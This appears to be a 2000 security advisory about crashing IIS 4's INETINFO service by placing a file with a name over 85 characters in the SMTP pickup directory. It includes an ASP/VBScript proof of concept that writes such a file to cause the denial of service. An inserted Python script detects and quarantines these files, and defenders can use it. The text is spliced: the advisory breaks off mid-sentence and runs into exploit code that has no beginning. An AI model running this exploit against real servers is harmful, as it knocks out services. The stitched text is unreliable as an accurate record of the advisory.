IIS 4 Denial of Service
Reported February 20, 2000 by valentijn
Internet Information Server 4.0 on NT 4.0 with SMTP
It is possible to cause a denial of service condition against IIS by manipulating
file names within the SMTP service's directory structure. Creating a file with a
name of more than 85 characters in the "\mailroot\pickup" directory causes the
mail server to generate an error and crash the INETINFO service, which supports IIS.
In addition, as long as the file remains in place, IIS
cannot start up properly. To restore service, the file must be removed.
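A cleanup check for the condition described above, as an added example that is not part of the original advisory: it lists pickup-directory files whose names exceed 85 characters and moves them aside under short names so the service can start again. Counting the extension toward the length, the function names and the holding folder are assumptions.

```python
import shutil
import tempfile
from pathlib import Path

MAX_NAME_LEN = 85  # from the advisory: longer names crash INETINFO


def find_long_names(pickup_dir, max_len=MAX_NAME_LEN):
    """Return pickup files whose name (extension included, an assumption) exceeds max_len."""
    return sorted(p for p in Path(pickup_dir).iterdir()
                  if p.is_file() and len(p.name) > max_len)


def quarantine(pickup_dir, quarantine_dir, max_len=MAX_NAME_LEN):
    """Move over-long files out of pickup; return (original_name, new_path) pairs for audit."""
    qdir = Path(quarantine_dir)  # hypothetical holding folder outside mailroot
    qdir.mkdir(parents=True, exist_ok=True)
    moved, n = [], 0
    for src in find_long_names(pickup_dir, max_len):
        dst = qdir / f"held_{n:04d}.eml"
        while dst.exists():  # never overwrite an earlier quarantined file
            n += 1
            dst = qdir / f"held_{n:04d}.eml"
        shutil.move(str(src), str(dst))
        moved.append((src.name, dst))
    return moved


def demo():
    """Run against constructed sample files in a temporary directory."""
    root = Path(tempfile.mkdtemp())
    pickup, held = root / "pickup", root / "held"
    pickup.mkdir()
    (pickup / "normal.eml").write_text("Subject: ok\n")
    (pickup / ("A" * 81 + ".eml")).write_text("Subject: 85 chars\n")  # at the limit
    (pickup / ("B" * 82 + ".eml")).write_text("Subject: 86 chars\n")  # over the limit
    flagged = [p.name for p in find_long_names(pickup)]
    moved = quarantine(pickup, held)
    remaining = sorted(p.name for p in pickup.iterdir())
    return flagged, moved, remaining


if __name__ == "__main__":
    flagged, moved, remaining = demo()
    print("flagged:", flagged)
    print("moved to:", [str(dst) for _, dst in moved])
    print("left in pickup:", remaining)
```

Run `quarantine()` against the real pickup path while the service is stopped, and keep the returned pairs as a record of which original names were found.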
This demonstration code runs on the server side, which
means you need a way to get the code onto the server to begin with. This may imply a
rather low risk, since it's hard to get foreign code onto a remote server, but consider a
scenario that involves an ISP that routinely allows ASP code to be installed on
' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"
Set fso = CreateObject("Scripting.FileSystemObject")
' 80 random letters + temp file name + ".eml" gives a name longer than 85 characters
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(Rootpath).CreateTextFile(Thename)
' Write a minimal message into the pickup file
Thefile.writeline "X-Sender: [email protected]"
Thefile.writeline "X-Receiver: [email protected]"
Thefile.writeline "From: <[email protected]>"
Thefile.writeline "To: <[email protected]>"
Thefile.writeline "Subject: MINE DID NOT CRASH"
Thefile.writeline "Date: " & now()
Thefile.writeline "X-Generator: " & Thename
Set Thefile = Nothing
Thename = ""

' Returns a string of 80 random letters used as the file name prefix
Function Createkey()
    For z = 1 To 80
        a = Int((25 * Rnd) + 1)
        password = password & Chr(a + 65)
    Next
    Createkey = password
End Function
Microsoft is aware of this
issue; however, no comment was available at the time of this writing.
Discovered by valentijn